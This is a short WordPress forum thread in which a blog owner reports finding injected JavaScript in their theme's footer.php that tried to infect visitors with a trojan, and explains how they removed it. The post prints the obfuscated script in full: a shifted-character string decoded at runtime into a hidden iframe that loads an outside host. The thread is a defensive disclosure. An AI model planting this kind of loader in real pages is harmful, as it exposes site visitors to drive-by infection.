Trojan.Phel.A and WordPress (2 posts)

  1. quasistoic
    Posted 10 years ago #

    This is just an FYI in case others experience a similar problem. The below is quoted from an email I sent to my webhost to let them know that the problem (which I had reported earlier in the day) was on my end and not theirs.

    When Windows SP2 IE users were accessing my WordPress blog ( http://quasistoic.org/ts/ ), some rogue javascript was trying to infect their machine with what appears to be Trojan.Phel.

    Related documents (based on VirusScan and NortonAV alerts):

    I found the offending javascript in my /ts/wp-content/themes/default/footer.php file. I'm guessing it got there thanks to a security hole in WP Here it is in all its glory:
    <script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

    Actions taken: Upgraded to WordPress, which addresses a number of security concerns in (and hopefully the one which allowed the script to be inserted into my footer template). I also removed the nasty javascript from my footer template. These actions seem to have fixed the problem.

  2. Jonathan Dingman
    Posted 10 years ago #

    That might have been a template problem and not a problem with WordPress itself. I've never seen this, so you might have also had a damaged package.

Topic Closed

This topic has been closed to new replies.

About this Topic